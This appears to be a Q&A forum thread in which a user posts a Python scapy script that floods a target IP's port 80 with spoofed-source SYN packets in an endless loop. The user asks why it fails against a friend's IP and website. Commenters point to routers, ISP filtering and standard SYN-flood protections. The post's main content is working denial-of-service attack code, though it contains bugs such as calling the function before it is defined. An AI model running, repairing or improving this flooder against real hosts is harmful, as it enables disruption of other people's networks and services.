# My syn flood python script is not working when I try to flood another ip than mine

Tags: python, networking, tcp, ip, scapy

This is the attack function:

```
from copy import error
from ensurepip import version
from pickle import FALSE
from sqlite3 import connect
from struct import pack
from sys import flags  
from tabnanny import verbose
from tkinter.tix import Tree
from scapy.all import *
from scapy.modules.nmap import *



can_attack = False
target_Ip = "friend's ip"
target_Port = 80
attack(target_Ip, target_Port)

def attack(targetIp,targetPort):
     pkt =IP(src=RandIP(), dst= targetIp)/ TCP(sport =RandShort(), dport=targetPort, seq=1505066, flags="S")
     package = pkt/Raw("B"*1200)
     can_attack = True
     while can_attack == True:
         send(package,loop=1,verbose = 0)
```

I tried this code on my ip and everything worked fine, but when I try this script on my friend's ip, he got nothing on wireshark or any internet drops. I tried this on my friend's website and the site stayed intact.

Comment: Is he behind a router? Does he have port forwarding enabled on the router?

Comment: It's also possible that the ISP detects this and blocks it.

Comment: Most web sites have SYN-flood protection, so you can't take them down like this.

Comment: That is an old attack for which we have protections. It is likely to fail under most circumstances.